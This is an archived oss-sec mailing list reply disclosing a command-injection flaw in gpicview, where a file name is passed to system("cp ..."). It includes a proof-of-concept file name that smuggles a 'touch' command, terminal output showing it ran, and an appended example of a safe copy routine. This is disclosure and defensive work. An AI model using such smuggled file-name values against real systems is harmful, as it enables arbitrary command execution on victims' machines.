oss-sec mailing list archives

Re: CVE Request (gpicview)


From: Robert Buchholz <rbu () gentoo org>
Date: Wed, 3 Sep 2008 01:59:47 +0200

On Sunday 31 August 2008, Nico Golde wrote:
Same piece of code in main-win.c doesn't look too trustworthy
to me either:

    int error = jpegtran (filename, "/tmp/rot.jpg" , code);
    if(error)
        return error;

    //now copy /tmp/rot.jpg back to the original file
    char command[strlen(filename)+50]; //this should not generate buffer owerflow
    // MS: didn't know, how to make it better, maybe an own copy routine
    sprintf(command,"cp /tmp/rot.jpg \"%s\"",filename);
    system(command);

Anyone played with crafted file names?

Good catch! You need to append '.jpg' at the end of the crafted filename
so the rotation via jpegtran is invoked, but besides that it works ok:

rbu@peanut ~/devel/gentoo/security/gpicview $ ls -l
total 484K
-rw-------  1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg

rbu@peanut ~/devel/gentoo/security/gpicview $ gpicview *
QSettings: failed to open file '/usr/qt/3/etc/settings/qt_plugins_3.3rc'
sh: .jpg: command not found
^C

rbu@peanut ~/devel/gentoo/security/gpicview $ ls -l
total 960K
-rw-------  1 rbu rbu 469K 2008-09-03 01:52 bla.jpg
-rw-------  1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg
-rw-------  1 rbu rbu    0 2008-09-03 01:52 XX


Robert
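As an added example that is not part of this thread or of gpicview's code: the "own copy routine" the source comment itself hints at, written with open/read/write so the file name never reaches a shell, followed by a self-check using the crafted name from the listing above. It assumes a writable /tmp; the file name and contents it creates are constructed for the demonstration.

```c
/* Added example, not gpicview's code: an own copy routine, the fix the
 * source comment itself hints at, in place of sprintf()+system("cp ...").
 * Assumes a writable /tmp; the file name and contents are constructed. */
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Copy src to dst with open/read/write. No shell ever sees the file name,
 * so a '"' or ';' in it is just a character, not command syntax. */
int copy_file(const char *src, const char *dst)
{
    char buf[4096];
    ssize_t got;
    int in = open(src, O_RDONLY);
    if (in < 0) return -1;
    int out = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (out < 0) { close(in); return -1; }
    while ((got = read(in, buf, sizeof buf)) > 0) {
        for (ssize_t done = 0; done < got; ) {
            ssize_t w = write(out, buf + done, (size_t)(got - done));
            if (w < 0) { close(in); close(out); return -1; }
            done += w;
        }
    }
    close(in);
    return (got < 0 || close(out) < 0) ? -1 : 0;
}

/* Self-check with the crafted name from the thread. Returns 0 on success;
 * any non-zero value names the step that failed. */
int demo(void)
{
    static const char rot[] = "/tmp/gpicview_demo/rot.jpg";
    static const char crafted[] = "/tmp/gpicview_demo/bla.jpg\"; touch XX ;\".jpg";
    char back[4] = {0};
    mkdir("/tmp/gpicview_demo", 0700);      /* ok if it already exists */
    unlink("/tmp/gpicview_demo/XX");        /* start from a clean state */
    int fd = open(rot, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0 || write(fd, "JPEG", 4) != 4) return 1;
    close(fd);
    if (copy_file(rot, crafted) != 0) return 2;
    fd = open(crafted, O_RDONLY);
    if (fd < 0 || read(fd, back, 4) != 4) return 3;
    close(fd);
    if (memcmp(back, "JPEG", 4) != 0) return 4;
    /* with system("cp ... \"<name>\"") this name would have run `touch XX` */
    return access("/tmp/gpicview_demo/XX", F_OK) == 0 ? 5 : 0;
}
```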
